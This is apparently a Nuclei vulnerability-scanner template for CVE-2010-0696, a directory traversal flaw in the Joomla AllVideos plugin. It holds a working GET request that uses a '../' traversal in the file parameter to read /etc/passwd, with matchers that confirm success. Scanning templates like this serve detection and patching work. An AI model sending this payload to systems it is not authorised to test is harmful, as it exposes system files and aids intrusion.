27 lines
837 B
YAML
27 lines
837 B
YAML
|
id: CVE-2010-0696
|
||
|
|
||
|
info:
|
||
|
name: Joomla! Component Jw_allVideos - Arbitrary File Download
|
||
|
author: daffainfo
|
||
|
severity: high
|
||
|
description: Directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter.
|
||
|
reference:
|
||
|
- https://www.exploit-db.com/exploits/11447
|
||
|
- https://www.cvedetails.com/cve/CVE-2010-0696
|
||
|
tags: cve,cve2010,joomla,lfi
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd"
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
|
||
|
- type: regex
|
||
|
regex:
|
||
|
- "root:.*:0:0"
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|